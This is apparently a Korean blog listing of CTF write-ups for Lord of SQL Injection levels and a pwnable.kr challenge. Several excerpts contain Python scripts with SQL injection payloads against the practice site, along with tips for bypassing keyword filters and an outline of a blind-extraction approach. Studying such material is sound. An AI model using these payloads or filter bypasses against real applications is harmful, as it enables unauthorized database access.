WarGame(229)
-
8. LOS - troll
8번째 문제 troll입니다. 간단하게 풀었습니다. id에 admin을 넣어주면되는데 ereg함수는 대소문자를 구별해서 맨앞글자만 대문자로 해서 넣어주면 풀립니다 :) 페이로드입니다. 1234567891011import requestsimport string URL = "http://los.eagle-jump.org/troll_6d1f080fa30a07dbaf7342285ba0e158.php"payload = "?id=Admin"URL += payload cookies = dict(PHPSESSID="dvs710ccqajrn9434hc3a00r11")response = requests.get(URL, cookies = cookies)print(response.text) Colored by Color Sc..
2018.08.05 -
7. LOS - orge
LOS orge입니다 여기서 조금 많이 걸렸습니다. 소스코드를보면 4번 문제와 아주 유사한다 or하고 and 가 ban먹었습니다. 그래서 이거우회하느라 시간이 많이걸렸고 알수없는 문법오류떄문에 삽질했습니다..ㅎ tip!! {or -> ||and -> %26%26 } 아래는 페이로드입니다. 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849import requestsimport string num_alpha = string.digits + string.ascii_letterspassword = "" #find length passwdresetURL = "http://los.eagle-jump.org..
2018.08.05 -
6. LOS - darkelf
LOS 6번 darkelf입니다.소스코드를 확인하면 다음과 같습니다. 이전거와 달라진점을 찾는다면 or이 ban먹었습니다.전에 알려준 두번째 방법처럼 or -> ||으로 바꾸면 필터링을 넘어가게 됩니다! 페이로드입니다 :) 1234567891011121314import requestsimport string URL = "http://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php"payload = "?pw=1'||id='admin'%23"URL += payload cookies = dict(PHPSESSID="dvs710ccqajrn9434hc3a00r11")response = requests.get(URL, cookies = cookie..
2018.08.05 -
5. LOS - wolfman
이번은 LOS 5번 wolfman입니다. 소스코드를 확인하면 id를 admin으로 만들어주면 풀 수 있게 됩니다. 페이로드는 다음과 같습니다. 12345678910111213import requestsimport string URL = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php"payload = "?pw=1'or%09id='admin'%23" # "?pw=1'||id='admin'%23" 0: for i in range(1, 10) : print("WOOOOOOOOOOOOOOOOOOOOOOWsolveIT!!")cs
2018.08.05 -
4. LOS - orc
저번에 심심할때 풀었다가 orc에서 막혀서 다시 포너블에 집중하고, lob, FC3 올클하고 다시왔습니다... 방학동안 너무 놀았어서서 탈이네요 ㅠ 공부 좀더 일찍 시작할껄..ㅠ 본론으로 들어가죠 코드를 보면다음과 같습니다. password의 길이는 구하는 함수인 LENGTH를 이용하고SUBSTR함수를 이용해서 한글자씩 비교하면 좋겠군요!! 아래는 페이로드입니다 :) 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849import requestsimport string num_alpha = string.digits + string.ascii_letterspassword = "" #find lengt..
2018.08.04 -
pwnable.kr - collision
먼저 코드부터 확인해보면 다음과 같습니다. 프로그램상 실행하면서 인자값으로 데이터를 전달받기때문에 값은 인자로 넘겨주면될 것 같습니다. 조건1 : 인자1개이상 넣어주기조건2 : 길이 20byte로 맞추기조건3 : hashcode와 함수를 통과한 넣어준 값일치하게하기 함수를 보면 인자로 받은 값을을 4byte씩 끊는 것을 볼 수 있습니다. 이렇게 총 5번을 나눠서ㅁㅁㅁㅁ/ㅁㅁㅁㅁ/ㅁㅁㅁㅁ/ㅁㅁㅁㅁ/ㅁㅁㅁㅁ이렇게 만들고 이거를 배열로 가정하였을때[0] + [1] + [2] + [3] + [4] = hashcode가 되어야합니다. 그럼 hashcode를 5로 나누면 될 것 같습니다.이대로 exploirt코드 작성해서 익스해주면?? 왜 안되지...라고 생각했는데 프로그래머계산기는 나머지를 버릴수밖에 없어서 21..
2018.08.03